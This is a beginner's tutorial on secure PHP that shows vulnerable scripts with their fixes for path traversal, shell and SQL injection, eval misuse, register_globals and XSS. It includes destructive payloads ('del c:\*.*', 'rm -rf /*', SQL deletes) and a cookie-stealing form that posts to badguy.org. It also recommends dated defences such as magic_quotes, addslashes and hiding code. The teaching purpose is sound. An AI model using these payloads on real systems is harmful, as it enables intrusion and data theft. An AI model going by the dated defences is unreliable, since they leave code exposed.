Secure Programming with PHP for Beginners

by Ulrich Speidel

PHP and other WWW scripting languages permit extensive functionality to be offered to users via the WWW interface. To prevent this functionality from being used to your or somebody else's disadvantage, it is important to avoid security holes right from the start. An important step in this direction is to avoid typical "beginners' mistakes". This article shows you a number of typical traps. You'll also learn how to recognize these (and similar) scenarios in advance and how to avoid them. We finish up with a collection of strategies that help you secure your site and keep it secure.

You have probably read or heard about it in the media: Once again someone has broken into the web server of a large company, organization or government authority. The unknown hackers (also known as "crackers") have defaced the web pages or have caused even worse damage. These are the spectacular cases. Unfortunately, break-ins into web servers are very common - in many cases, the victims never find out. Some examples:

The possibilities of causing damage are almost unlimited. However, one thing that isn't unlimited is the number of basic techniques that malicious hackers can use to gain access to your web server or database.

What computer programs are permitted to do - and what they mustn't do

OK, now you've embarked on your first cautious steps into the exciting realm of PHP programming. And I'm already telling you about all the things that could potentially go wrong. Und ich Brummbär erzähle Ihnen jetzt schon, was dabei alles schief gehen kann. Shouldn't you possibly leave PHP programming to the experts? Don't panic - what you're about to read is useful, easy to digest and possibly news to your run-of-the-mill programmer friend.

At the risk of offending some of my esteemed colleague: The majority of security holes in web sites are can probably be attributed to experienced programmers. Compared to them, you have an advantage as a beginner: You're not set in your ways yet. What do I mean by that?

Quite simply: The vast majority of programmers (even those that learned their craft in the last few years) are trained to make computer programs "run". Once upon a time, when computers still worked away in splendid isolation, one thing had priority: Given a legal input, a program had to produce useful output as quickly as possibly, using as little memory as possible.

Admittedly, it would have been pretty absurd if a user of a DOS PC had deliberately fed junk data to a program in order to have it spit out or modify data that was anyway under his control. Very few people burgle their own homes. If burglars have no way of getting to your home, then there's nothing wrong with leaving a window open. In other words, under weird input your standalone computer software was allowed to do things it wasn't intended for.

With the arrival of the Internet, this is a different ballpark though. Suddenly, the entire world can send data in arbitrary combination and quantity to your machine. If this data reaches one of your programs (e.g., a PHP script), it should be certain that the program will only undertake operations with it that you are happy with. If the data does not conform to your expectations, your program should at least be able to handle them safely. This could be, e.g., the output of an appropriate error message, or an appropriate log entry, or simply by cutting the connection to the troublemaker that has sent you all the rubbish. Let's establish our most important rule: An Internet program must not only do what it is intended for, but must also refrain from doing anything it was not intended for.

Seems obvious? Great. If you're finding the first part a little bit complicated, the second part may sound like an additional headache. However, it doesn't have to be that way: The first part gets considerably easier if you specify exactly what your program may do under which circumstances. In other words: Together with the security holes, the bugs often disappear, too.

A Simple Example

You have a web site with a form that contains a select list. Via this list, your users can select a month, i.e., an integer number between 1 and 12. When the form is submitted, this number is passed to your script - STOP!

Why have I just shouted "STOP!"? Because it's the program flow we expect: A user completes our form and submits it to our script. So far, so good. That's the way it's meant to be. However, what about the unanticipated?

Let's have a look at the <form> tag of your form.

...
<form method="post" action="myScript.php">
...

This says that your form will be sent to a script called myScript.php when it's submitted. The script is located in the same directory on the web server as the form being shown. Now, what stops us from writing the tag as follows:

...
<form method="post" action="http://www.hacking-target.com/theirScript.php">
...

That sends the data to a different script on the Internet. Now you may ask why you should want to send your carefully collected data to someone else who probably can't make any sense of it. Good question. You can answer it yourself. Let me continue with a counter-question: If we can send our data to other people's scripts, then what's there to keep other people from writing forms that let them send data to our script myScript.php?

The answer: There's no way to stop them. And that's the problem: We can no longer simply assume that the data that is passed to our script under the variable name of the select list does in fact originate from our list. If a hacker wants it to be that way, the data could be arbitrary. In other words: Apart from numbers, our script myScript.php must also be able to cope with arbitrary other strings.

Putting it on a more general footing: No matter whether your form element is a select list, a checkbox, a text input field or a radio button - the script that receives the form data only receives the (freely chosen) name of the element and the associated value. This value may always be an arbitrary string.

How Can a Hacker Exploit This? Three Examples

To turn your script into a kind of "zombie" using specially crafted form data, the hacker must exploit functionality that is already present in your script, e.g.:

Let's have a look at a few examples to illustrate this:

Example 1: Unauthorized access to files

Let's have a look at a little greeting card script. I'll give you a little HTML form with the following input elements:

...
<form method="post" action="myGreetingScript.php">
<p>
Enter your first name here:
<input type="text" name="sender">
</p>
<p>
Enter the e-mail address of the person that you would like to greet:
<input type="text" name="addressee">
</p>
<p>
Enter your greeting message here:
<textarea rows="10" cols="60" name="message">
</p>
<p>
<input type="submit" value="Send greeting">
</p>
</form>
...

I've left the rest of the HTML code away in order to keep things readable. If you load this page into your browser, you'll get a text input field for your first name, one for the addressee's e-mail address (so he or she can be notified by e-mail) as well as a field where you can enter the actual message. You'll also see a button that lets you send off the electronic postcard. Simple, isn't it?

So far, we haven't made any mistakes - remember, we need some functionality in the script in order to wreak havoc. Let's have a look at excerpts from the associated PHP script myGreetingScript.php:

...
// Save the message as an HTML file in a subdirectory called
// "greetings" of our web site. The file name is the first name of the sender,
// which we get from the browser via $_POST["sender"].
// First, we open the file:
$fp = fopen ("/path/to/our/site/greetings/".$_POST["sender"].".html", "w");
// Then vwe wrap the message in a little bit of HTML
$message="<html><body>".$_POST["message"]."</body></html>";
// ...and write it to the file:
fwrite($fp,$message);
// Now we're sending an e-mail to the addressee to notify him/her of the
// greeting message. This e-mail contains a URL that points at the file
// (the greeting message) that we have just written.
// After the e-mail, we'll also output a confirmation to the sender.
// None of this is shown here though as the damage has already been done!
...

Once again we've left out a lot here and will instead concentrate on the sore points. How can we get the script do something that the owner didn't expect it to do? Now, let's plot: The site will most likely have a start page (index page). Your browser will tell you what the respective file is called, e.g., index.html. A "real" card greeting will reveal that index.html is located in the directory above the one that stores the greeting data. You only need to compare the URLs of the start page and that of the greeting card (in the e-mail). OK, now consider what happens of the user enters

../index

as the sender's first name. Did you guess right? The file that we're now opening for writing is the file with the path:

/path/to/our/site/greetings/../index.html

However, that's the same as:

/path/to/our/site/index.html

As a result, we have managed to overwrite the site's start page, using the content which we specified in the textarea. How could the site's programmer have prevented this? Very simple: He could have removed all special characters from the sender name before using it as a file name. Even better, he could have used a unique file name generated by the script rather than the user, like so:

...
$filename = "/path/to/our/site/greetings/".uniqid("").".html";
$fp = fopen ($filename, "w");
...

In this case, it would have been appropriate to consider what exactly might be contained in our variable $_POST["sender"] and how it might be used. As a matter of principle, it is a bad idea to used browser-supplied variables in file names or in external commands (commands that are invoked via the command line of the server or the database). Watch carefully what might go into include(), include_once(), require(), require_once(), file(), readfile(), file_get_contents(), file_put_contents(), and other commands that read or write files. In most cases, that's not necessary anyway. The next example shows how an external command can be used with malicious intent.

Example 2: Code-Injection into the command line

The second "technique" that I'd like to warn you about follows the same lines as the first, but it's potentially even more dangerous. In this example, we're not only mixing parts of file names into our input data, but are even executing commands on the server. The scenario: You have written/purchased/borrowed/stolen a little command line program called horoscope that outputs a horoscope if you hand it a date as command line parameters. Under Windows, that'd work as follows for October 7, 1965 so:

C:\Program Files\SuperHoroscope>horoscope.exe 7 10 1965
Not all days are as eventful as today, ...

You now want to make the output of this program available via the web. So you write a little form that lets the user choose day, month and year via three select lists. The lists are called "day", "month" and "year", respectively. Since you already know that these don't absolutely have to be select lists as any hacker worth his salt can just create an arbitrary from form hacking purposes, we'll dump the form and look straight at the code of misconduct:

...
$day=$_POST["day"]; $month=$_POST["month"]; $year=$_POST["year"];
system("C:/Program Files/SuperHoroscope/horoscope.exe $day $month $year");
...

Once again, our script works as a shining example. If you're using the intended form, you get your horoscope. However, if you use a form with the following hidden input field:

...
<input type="hidden" name="day" value="11 9 2001; del c:\*.*;">
...

then there'll be about as much left of the server's file system as there was left of the twin towers. The first unprotected variable was not only sufficient to submit all parameters for a successful execution of horoscope.exe, but also to submit a semicolon as a separator and to "inject" a subsequent DELETE command. The other variables may be left empty or may be filled with other variables. In order to protect yourself against such hack attacks, you definitely don't need an army though. You could have simply ensured that your variables only contain numbers that represent a day, month, or year respectively. In the case of deviating data, you could have aborted your script with an error message. Alternatively, there's also the PHP function escapeshellarg(). It defuses all potentially dangerous characters by backslash escapes and places the parameters inside quotes:

...
$day=escapeshellarg($_POST["day"]);
$month=escapeshellarg($_POST["month"]);
$year=escapeshellarg($_POST["year"]);
...

However, in this case horoscope.exe must be able to cope with potentially inconsistent parameters, which may still represent a security risk. An input check would definitely the best choice here.

Example 3: SQL code injection

The third trick that I would like to introduce you to here is once again a variant of the two previous security holes. In this case, we're exploiting the PHP interface to our database in order to gain access to a system. Let's suppose that you store the access data for an Internet banking system in a table called accounts in your database. The table has two columns (fields) and in each row, we find the record for a particular account:

AccountNumber AccountPassword
145054 9nd3qw1y
873221 abcd1234
... ...
548745 2afje9r
... ...

Many databases let you access this kind of table using a language known as SQL (perhaps you already know SQL? Great!). An SQL command that lets us, say, retrieve the record for account number 873221 and password abcd1234, looks like this:

select * from accounts where AccountNumber = 873221 and AccountPassword = "abcd1234"

Suppose you're showing your users a login page that lets them log into your system using their account number and password. Then you'll be able to compose the SQL command in your PHP script as follows:

...
$sqlCommand = "select * from accounts where AccountNumber = "
. $_POST["accountnumber"]
. " and AccountPassword = \""
. $_POST["accountpassword"]."\"";
...

For account number 873221 and the password abcd1234 you'll get exactly the same SQL command as above, except that it's neatly tucked away in a PHP string. This is easily digested by the various query functions in PHP that hand on your command to the desired database.

You can crack such a script even without a special form. In order to get unauthorized access to the account with, say, number 548745, you may even leave the password field empty altogether. Instead, you enter the following string as the account number:

548745 or AccountNumber = 0 

That makes your SQL command look like this:

select * from accounts where AccountNumber = 548745 or AccountNumber = 0 and AccountPassword = ""

In other words: The database will return all records that match at least one of the two following conditions:

  1. The account number is 548745
  2. The account number is 0 and the account password is empty (we could of course specify any other account number here)

The second condition is probably hard to satisfy, but the first one is trivial, at least as long as there is an account with number 548745. Whatever, we're now free to use the account as we wish. Similar tricks may permit you to change account balances, fake transactions, set up accounts, etc.

By the way: We were rather benign here - some databases would have cooperated in the following

548745;
delete from accounts where AccountNumber = 643894;
select * from accounts where AccountNumber =

That way, not only would we be able to access someone else's account, we'd also be able to let our boss (whose salary account number 643894 we've managed to get from someone in Finance over a beer) go insolvent without a trace.

The trick I've just shown you is easily thwarted by putting quotes around the value you're comparing against in your SQL command, i.e.:

...
$sqlCommand = "select * from accounts where AccountNumber = \""
. $_POST["accountnumber"]
. "\" and AccountPassword = \""
. $_POST["accountpassword"]."\"";
...

This would turn our malicious input into a non-existentent acount number. If you think that this is a little naive, you're not entirely wrong. Firstly: Can we really treat each number as if it was a string? Secondly: What keeps a hacker from entering quotes himself and thus from subverting our security measures? Good questions.

The answer to the first question is: "Not always, but often". If the submitted value must be a number (e.g., in a larger-than or smaller-than comparison), we'll have to check explicitly beforehand whether we've really been given a number.

The answer to the second question depends on your PHP configuration. The important bit here is a configuration setting named magic_quotes_gpc in the configuration file php.ini. It determines whether (single or double) quotes submitted by the browser should be escaped by a preceding backslash. What does this mean? Simple: Imagine that you have a form with a text input field called "dish" that takes the name of a dish. The processing script could - in the simplest case - just echo the specified dish name back to the user:

...
echo $_POST["dish"];
...

If you have kept the default setting of magic_quotes_gpc in php.ini, i.e., it's On, the input

Spaghetti "Bolognese" with parmesan cheese

won't return the original, but

Spaghetti \"Bolognese\" with parmesan cheese

instead. In many cases, though web programmers or system administrators consider this to be a nuisance and simply turn magic_quotes_gpc off. In this case, our quotes are a fruitless security precaution. The hacker could simply enter

548745";
delete from accounts where AccountNumber = 643894;
select * from accounts where AccountNumber = "

That would put us back to square one. If, however, magic_quotes_gpc is still On we're home and hosed - the hacker's quotes have been defused by the backslashes.

How do you check whether magic_quotes_gpc is set to On? If you have installed your own server, you can look it up in php.ini. If you have no control over the server configuration, you can simulate the effect of magic_quotes_gpc On, by entering the following code snippet at the beginning of your script

...
$get_safe = $_GET;
$post_safe = $_POST;
$cookie_safe = $_COOKIE;
if (!get_magic_quotes_gpc()) {
// add backslashes to browser variables
foreach ($_GET as $key => $value) {
$get_safe[$key] = addslashes($value);
}
foreach ($_POST as $key => $value) {
$post_safe[$key] = addslashes($value);
}
foreach ($_COOKIE as $key => $value) {
$cookie_safe[$key] = addslashes($value);
}
}
...

and by using the "defused" variables $get_safe, $post_safe, and $cookie_safe instead of $_GET, $_POST and $_COOKIE.

Taking stock

Well, you now know the more common trickery. As you have probably noticed, all three examples have always used the same fatal combination:

  1. form variables submitted by the browser that contained unexpected strings
  2. a function that executes programs outside of PHP or that reads or modifies data or files

None of these two ingredients can be entirely avoided with ease. However, you can ensure that submitted data either matches the format that you expect, or that the data is made safe before it is being passed to the function involved. The next section demonstrates how this can be done.

Checking or defusing input data

You've already had a sneak preview of defusing browser-supplied data: Before passing values to the command line, you can quarantine them electronically by escapeshellarg(). Before insertion into SQL query strings, you can often take the bite out of dangerous quotes and apostrophes via addslashes() or magic_quotes_gpc On. Sometimes, though, defusing isn't an option. That's the case, e.g., if your command line code doesn't like quotes or if it might behave insecurely under incorrect input, or if  you have to compare numerical amounts in SQL. In these case, only an explicit check will help. Such a check may be a good idea in any case, e.g., because you want to log break-in attempts in a log file, or because you would like to give the user feedback about erroneous (but harmless) input.

Checking browser-submitted data

In principle, you have the choice between two strategies here. The first strategy consists of defining exactly what values a certain input field may contain. If you would like to see a New Zealand postal code, for example, the input should consist of exactly four digits. In the case of an input that has to be from a clearly defined set (such as "January", "February", "March",...), e.g., from a select list or a set of radio buttons, you can check directly whether the input corresponds to one of the values in the set. If you are able to apply this strategy, then that's great - it ensures that you're really only processing values that you expected in the first place.

The downside of the first strategy is that it's sometimes a bit difficult to define exactly what is to be permitted. If you are asking for a surname, for example, "d'Artagnan" should probably pass, while "x'utwfrt" is probably not to be found in anyone's passport and would thus have to be regarded as suspect. As a result, you may have to loosen up and be prepared to accept junk data as long as it's harmless. In the case of a name, you might want to demand that it may contain apostrophes, but no double quotes, semicolons or other funny characters. This loosening may open back doors, though: Apostrophes, for example, may serve as replacements for double quotes in SQL commands. Thus, you need to make sure that things that can contain apostrophes don't turn up unprotected in an SQL statement.

The second strategy is to search explicitly for forbidden characters. E.g., in order to subvert the SQL command in the previous example (value packaged inside ""), we need a double quote, come what may. Thus it is sufficient to check our string explicitly for the presence of such a (double quote) character. The disdavantage of this strategy is that there may be more than one "problematic" character. This is in particular the case when the string is eventually going to be part of something that's passed to the command line, where - depending on the shell - there are several characters that act as syntax rather than data. You could be chasing your tails.

So, how do we implement the two strategies? The magic word here is regular expressions.

Regular Expressions

Doesn't ring a bell? No worries - we'll explain them right now. In PHP, there are two kinds of regular expressions. The one kind, (POSIX compatible) is only intended for people who have been using them for years and don't want to let go. If you're a beginner in regular expressions, feel free to forget about them and plunge head-on into the second variety, the Perl-compatible regular expressions. All functions in PHP that deal with Perl-compatible regular expressions start with preg_ . The most important function is preg_match(). You'll hand it a pattern (the regular expression) and a variable, and it'll tell you whether the pattern matches the string.

Example: Your form variable postcode is supposed to contain a post code. In New Zealand, that's a four-digit number. In PHP, we can intercept corrupt post codes as follows:

...
if (!preg_match("/^\d{4}$/",$_POST["postcode"])) {
die("This letter won't get there, ever!");
}
...

OK, if you've been to my lectures, read my book (in German), or have learned it in some other way, the you'll know the trick: The pattern /^\d{4}$/ consists of two characters known as "delimiters" (the slashes), the anchor ^ that determines that the pattern must match at the beginning of the string and the anchor $ that extends it all the way to the end of the string. Between those two anchors, we want to find digits (\d). To be precise, we want four of them and since \d\d\d\d looks a bit tacky, we use a multiplier ({4}).

If the pattern matches, preg_match() returns the Boolean value true, which we're negating to false y putting an exclamation mark in front of the function. In this case, our variable has sailed around the reef. If not, we'll let the script die with an error message. Admittedly, you could use a page with more frills for that, but this isn't the point here. So far for strategy 1.

If we give a hoot about the content of the form variable postcode as long as it doesn't contain any quotes, we can do it like this:

...
if (preg_match("/\"/",$_POST["postcode"])) {
die("This letter won't get there, ever!");
}
...

In this case, we'll set off the alarm if there is a double quote anywhere (=no anchors) in our string. Since the double quote in the pattern is located between two double quotes of the PHP syntax, we have to protect it with a backslash. This time, a positive result is a reason for worry, so we don't need an exclamation mark in front of  preg_match().

Now that you know how to do the interception, all you need is a suitable regular expression for your input data, right? The following table shows a few useful expressions:

Use for
Pattern
A string that must only contain letters /^[^\W_\d]*$/
A non-empty string that must only contain letters /^[^\W_\d]+$/
A string that must only contain letters and that has to start with, e.g., hello
/^hello[^\W_\d]*$/
A string that contains a non-personalized New Zealand car license plate /^([A-Z]{2}\d{1,4}|[A-Z]{3}\d{1,3})$/
A string that contains an e-mail address /^\w[\w\-\+\&\.]*@([A-Za-z][A-Za-z0-9\-]{0,23}\.)*[A-Za-z]{3}/

Of course there are many more patterns - which you'll be able to construct yourself with a bit of practice. As always, getting your hands dirty is the best way to learn. The following little PHP script lets you carry out your own experiments:

<html>
<body>
<?php

// replace the expression below by the pattern that you
// would like to try out
$pattern = "/^\d{4,6}$/"; // Example: a string that consists of 4-6 digits
// test string that should match the pattern (or not):
$test = "12345"; // should match
if (preg_match($pattern,$test)) {
echo "The pattern ".htmlspecialchars($pattern)." matches ".htmlspecialchars($pattern);
}
else
{
echo "The pattern ".htmlspecialchars($pattern)." does not match ".htmlspecialchars($pattern);
}
?>
</body>
</html>

More information on regular expressions is available from a whole raft of sources - try this article. I learnt my basics a while ago using Learning Perl. As the Perl syntax for regular expressions is the same as in PHP, you can generally  use the expressions there without much of a change. Programming PHP also has an extended chapter on regular expressions, but treats the POSIX variety first, so you may have to turn a few more pages.

Filtering fixed values with switch-case

This filtering method is suited in particular for data that you expect from select lists or radio buttons. This limits the number of possible values from the start. Filter as follows:

...
$dayofweek = $_POST["dayofweek"];
switch($dayofweek) {
case "Monday": break;
case "Tuesday": break;
case "Wednesday": break;
case "Thursday": break;
case "Friday": break;
case "Saturday": break;
case "Sunday": break;
default:
die("Go try your luck elsewhere!");
}
...

Anything else?

Of course! So far we've only worried about how you're going to guide your user-supplied data safely through your first script. However, there are still a few back doors we need to know and shut.

Data from databases

If you're receiving data frm your users and are storing it in a database, you'll now be aware that you need to protect yourself against SQL code injection, and you'll know how to do that. However, once the data has reached the database, the job isn't over. Sooner or later you'll have to dig the data back out again. At that point, you'll have to ask yourself which values your database fields may have assumed as a result of the user input and whether they can still cause any damage.

If you have already subjected the data to restrictive filtering, the risk may not be that high. If you've relied on magic_quotes_gpc, you'll need to be a bit careful. This is because the backslashes that protect your data will be lost as the data is written to the database. If you have kept the default setting for yet another PHP configuration setting, called magic_quotes_runtime, you'll get a string without backslash escapes when you're reading from the database. Let's suppose that you would like to further process your data in one of the "risky" contexts that we have discussed, you have (once again) a problem. However - you know the solution: addslashes() or renewed filtering and/or packaging, depending on the intended use of the data.

File uploads

This is a touchy topic - even the PHP developers were struggling with this one, as is evidenced by the security updates during 2002. Buffer overflows in PHP aside (we've hopefully seen the last of them), there are in priciple two possible sources of danger here: the overwriting of existing files (if the user is able to influence the file name - as in our first example) and the clandestine upload of executable files to the server.

The latter is a problem if you wish to make the uploaded files available to the user, such as in photo album applications , shareware uploads, etc. (cf. the donor photo in our lecture example). In this case, you'll have to reveal to the user's browser where - and under which name -  the file may be found on the server. If the uploaded file is a PHP file, the user will of course be able to pick what he or she wants to do on your server. A system()-, exec()-,passthru()- or shell_exec() command in this file is able to do anything that a user with the privileges of the web server may do on the server machine: modify files, start or terminate programs,... Not a good idea? I think you understand.

The eval() function and variable variables

The eval() function or an equivalent to it are found in many programming languages - including PHP. You pass it a string with PHP code, which is then executed by eval(). Here, for example, we try to call the correct function via eval():
...
function circle_area($radius) {
return pi * $radius * $radius;
}

function square_area($length_of_side) {
return $length_of_side * $length_of_side;
}
...
$size = $_POST["size"];
$shape_type = $_POST["shape_type"]; // should be "circle" or "square"
eval("echo ".$shape_type."_area(".$size.");");
...
This can be quite useful under certain circumstances. However, avoid incorporating data into such a string if the data has been supplied by a user via the browser. In our case, you might fall victim to an unusual "shape type": circle(1); exec('rm -rf /*'); die could ruin a few things on your unix machine.

A similar risk exists when you use variable names that you can set dynamically in PHP:

...
$price = 30;
$column = "price";
echo "The value of column $column is ".$$column; // 30
...

This can also get you into trouble, in particular if you publish you code. How's that? Consider the following script:

...
// daily prices of our wholesale butchery
$chickenbreast = 15;
$porkschnitzel = 12;
$beefrump = 10;
// password for wholesale customers
$password = "huge_rebate"; // this is top secret!
// password entered by the user (empty for normal customers)
$userpw = $_POST["password"];
// Product selected by the user via a select list (or so we hope)
// "chickenbreast", "porkschnitzel", "beefrump", ...
$product = $_POST["product"];
// calculate price
$price = $$product;
if ($userpw == $password) {
$price = $price * 0.7; // 30% rebate, highly confidential
}
// output to the user
echo $product." costs ".$price." per kg";
...

Of course, your competitor might want to know how much rebate you're valued large-volum customers are getting. Since you've made your code available to the public (without prices and password, of course), generous as you are, your competitor may simply specify "password" as the product, using a homebrew HTML form. At that point, things turn to custard for you - your script "accidentally" exposes the  wholesale password as a price, completely ignoring your wish to keep it secret. That permits your competitor to have a look at your discounts next time round.

Of course, that is only one possible way to shoot yourself in the foot using variable variables. Note that, once again, insufficiently checked user input came to the party!

Default values for variables

As you have probably spotted, PHP is made for easy use. Part of this is the fact that you don't have to assign initial values to variables, which is common in other programming languages. In PHP, numbers are 0 by default, strings are empty and Boolean values are false. Nice. Values passed by the browser are available from $_POST,$_GET,$_COOKIE and partially $_SERVER. That didn't stop the inventors of PHP from creating a shortcut. If you open the PHP configuration file php.ini and set the variable register_globals to On, you could write  $phonenumber rather than $_POST["phonenumber"]. That isn't dangerous in itself, unless you're relying on a default value. Consider a script named myScript.php:
<?php
// $login and $password are supplied by the browser. A field called "superuser"
// doesn't exist in *our* browser form
if (($login == "superuser") && ($password == "ef9nw3c5")) {
$superuser = true; // first mention of the variable in the code
}
if ($superuser) { // ought to be false unless we've logged in using
// the login "superuser" and the password "ef9nw3c5"
// Code that only the superuser may execute goes here
...
}
else
{
// Code for other mortals
...
}
...
?>

If you invoke this script as myScript.php?superuser=1, you don't need to know the superuser password! Why? Well, PHP regards all variables that aren't either empty or equal to 0 as true. In this case, PHP registers the GET variable supplied by the browser at the beginning of the script's execution as $superuser. This means that the second if-statement executes the superuser code!

Cross-site scripting (XSS)

This is strictly speaking not a PHP security problem, but it is a common one. Imagine the following situation: You use a web application on your site, say a guestbook, that lets your users leave a comment. Before the comment is published, it is saved in a database. When you log into the application, you get to vet the comment. You can then edit it, delete it, or approve it, by submitting the comment back to the application. Because it's all just going into an HTML page, your users are allowed to write what they want, and you have taken care of backslash-escaping all data before it goes into the database. So this should be safe, right? Well, not necessarily.

When the comment is written into the HTML page, it is interpreted as HTML. That is great if you want your users to be able to include bold or italic text, paragraphs, lists, or tables. However, it also lets them include forms and JavaScript, and this is where life becomes dangerous.

Assume for a moment that your comment is printed out like this:

      <!-- other HTML of the page goes here ... -->
      <?php
// print out user comment
echo $userComment;
?>
<!-- ... and here -->

Now assume that a malicious user enters this as a comment:

I really like your page, ha, ha
<form name=spyform action=www.badguy.org method=post>
<input type=hidden name=cookieval>
</form>
<script>
document.spyform.cookieval.value = document.cookie;
document.spyform.submit();
</script>
      

This displays as I really like your page, ha, ha, but by the time you read this, you cookie (which presumably contains your session token and hence your login credentials for this session) is on its way to the guy who really likes your page. He can then log in as you (hijack your session), and use perhaps other functionalities of your site in order to deface it or get at confidential information.

Hold on a second - how could this happen? Well, the basic problem here is that we allowed the hacker to smuggle invisible HTML and JavaScript code into our browser, which made the browser commit an action that we didn't anticipate and that revealed information about us. Note that none of the above could have been prevented by backslash-escaping quotes!

Variants of this type of attack include reading other information on the page via the document object model (DOM), or modifying actions. For example, if the user comment in the above application is displayed inside a form field for editing/vetting, we could modify the above attack in such a way that we terminate the textarea early by inserting a </textarea> tag, add an onsubmit event handler to the form, which is called when you unsuspectingly approve the lot, and replaces the nice text with a horrible insult - which you have then, seemingly, approved!

This sort of attack is easily prevented by using the htmlentities() function on every bit of user information that reaches the screen:

      <!-- other HTML of the page goes here ... -->
      <?php
// print out user comment
echo htmlentities($userComment);
// or echo htmlspecialchars($userComment,ENT_QUOTES);
?>
<!-- ... and here -->

htmlentities() converts characters into their equivalent HTML entity representation whereever possible. This causes the HTML code to be displayed rather than interpreted, and we can see immediately what our admirer is really up to.

Note that it's not sufficient to just get rid of the literal < and > and turn them into &lt; and &gt;. It's just as important to convert quotes. This is because your user data may at times be written into the values of HTML attributes, like so:

      <!-- other HTML of the page goes here ... -->
      <input type="text" name="comment" value="<?php echo $userComment; ?>">
      <!-- ... and here -->
      

Even backslash-escaped quotes terminate the value string of an attribute, and an attacker can use this to add extra attributes, such as event handlers, which may be used for sinister purposes. For example, you could redirect the submission of a form to a different script, or even write a form via DOM into the page. htmlentities() takes care of HTML tags, entities, and quotes, as does htmlspecialchars(), provided that the ENT_QUOTES flag is set as the second parameter.

Another sore spot that you should watch out for is the writing of user-supplied data of any kind into URLs - ensure that this cannot have other values than the ones you explictly want to allow!

Strategies that help you avoid security holes

To wrap it all up, let's have a look at a collection of strategies that let you avoid security problems. Some of them may be familiar to you, others may be new to you.

Keep your code under wraps!
If you have a look at our previous examples, you'll find that all our attacks have profited from the fact that we knew the code. If you're using "public" code (e.g., from script archives), you're running the risk that people are searching systematically for this code. If you publish your own code, you risk that potential hackers will have a good look at it in order to find your little sins and omissions. If you're using public third-party code, renaming the scripts might pay off. If you use your own code and keep it under wraps, potential intruders are left in the dark.
Filter all input data that originates from the browser
OK, that's something I've already recommended to you on several occasions. Just a reminder: The input data from the browser includes not only the data in the $_POST array, but also the data in $_GET and $_COOKIE, as well as some data in $_SERVER that is based on browser-supplied information. That includes, among other things, the browser machine's IP address and the URL that purportedly referred the browser to your script.
Restrict the use of external functions to the absolutely necessary minimum
This is also something that I have suggested to you before. For most day-to-day tasks, PHP has customized functions available, which are easily found in the PHP manual. The use of external functions for the same purpose can only carry additional risk.
Keep your software up to date
The web is still relatively young, and as a result it happens now an then that someone finds a vulnerability in an operating system, in a web server, in a scripting language such as PHP or in a database. As most of these programs are widespread, hackers often scan systematically for maschines that run this software läuft. Notifications about vulnerabilities and/or patches may be obtained via the mailing lists of the software developers, manufacturers or distributors or from CERT. Vulnerable software should be replaced as quickly as possible by a "watertight" version - remember that the bad guys scan by IP, so you don't need to run a high-profile site for them to find you.
Whereever possible, leave magic_quotes_gpc On and register_globals Off
Even if it seems to be more convenient the other way around, this is the best solution by far as it defuses in advance a lot of potential security problems that originate from code injection or specification of non-empty default values. We've also discussed this before. If you cannot influence the setting, ensure that a change in settting cannot break your code: Insert backslashes into all $_GET, $_POST, and $_COOKIE variables you use and initialize all variables to a defined value before first use.
Restrict the open_basedir
The open_basedir directive in php.ini determines which directories your scripts should be able to open files from. Restrict this to "." if you can, especially in a shared hosting environment. Note that there is one PHP command - chdir() - which is able to cirumvent this restriction and should be disabled if at all possible.
Don't let your pages be cached by the browser if they contain confidential access information
If your users access your site from a "public" computer, e.g., from an Internet cafe or a university computer lab, a subsequent user of the machine may be able to fish the access information from the browser's cache memory. I quite like to use hidden forms and fields in my web pages, in order to keep the web server informed across a series of pages (called session), which user it is dealing with on the browser side. In this case, I must ensure though that the browser does not retain the access data in its memory any longer than is absolutely necessary - i.e., only while the page is actually displayed. In other words: I have to talk the browser out of wanting to cache the stuff. Look at the entry for the header() function in the PHP documentation to see how that is done.
Run PHP in Safe Mode
If you are able to configure your web server or at least PHP yourself, you should consider running PHP in Safe Mode. In particular on a platform with strict user separation, such as e.g., Unix or Linux or Win2K/XP, this helps you limit potential damage. Safe Mode only permits modifications of files owned by the user that also owns the executing script.
Encrypt data in transit between the web server and the browser with SSL certificates
This applies in particular if you want to handle financial or otherwise confidential transactions via your web site. For this, you'll probably need a server certificate, which you can obtain from your web hosting provider or from a certification company.
Use cryptic passwords
This is something that one shouldn't have to mention: passwords for web or database servers that can be found in a dictionary are - for all practical purposes - already cracked.